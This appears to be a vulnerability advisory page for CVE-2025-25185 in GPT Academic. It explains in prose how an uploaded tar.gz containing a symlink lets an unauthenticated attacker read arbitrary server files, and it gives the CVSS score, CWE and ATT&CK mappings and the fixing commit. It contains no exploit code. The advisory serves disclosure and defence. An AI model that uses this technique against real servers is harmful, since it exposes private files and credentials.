CVE-2025-25185
Published: 03 March 2025
Description
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Security Summary
CVE-2025-25185 is a file access vulnerability affecting GPT Academic, an open-source tool that provides interactive interfaces for large language models, in versions 3.91 and earlier. The issue arises because the application fails to properly account for soft links (symlinks) during handling of uploaded tar.gz archives. Classified under CWE-59 (Improper Link Resolution Before File Access), it carries a CVSS v3.1 base score of 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N), indicating high confidentiality impact from network-accessible exploitation with low complexity and no privileges required.
An unauthenticated attacker can exploit this vulnerability remotely by crafting a tar.gz file containing a malicious soft link that points to a target file on the victim server. After uploading the archive, the server decompresses it, and subsequent access to the symlink resolves to the targeted server file, enabling arbitrary file reads across the entire filesystem.
The GitHub security advisory (GHSA-gqp5-wm97-qxcv) and a related commit (5dffe8627f681d7006cebcba27def038bb691949) in the binary-husky/gpt_academic repository address the issue, with the commit likely implementing the fix for symlink handling during archive processing.
As GPT Academic supports interactive access to large language models, this vulnerability holds relevance for AI/ML environments where such interfaces are deployed, potentially exposing sensitive model data or configurations. No public evidence of real-world exploitation is noted in available details.
Details
- CWE(s)
Affected Products
AI Security Analysis
- AI Category
- Enterprise AI Assistants
- Risk Domain
- Privacy and Disclosure
- OWASP Top 10 for LLMs 2025
- None mapped
- MITRE ATLAS Techniques
- None mapped
- Classification Reason
- GPT Academic is a platform providing interactive interfaces for large language models (LLMs), fitting the Enterprise AI Assistants category as it enables user interaction with AI models in a deployed environment.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The vulnerability in symlink handling during tar.gz upload exploitation enables arbitrary file reads from the local system (T1005) via a public-facing web application (T1190).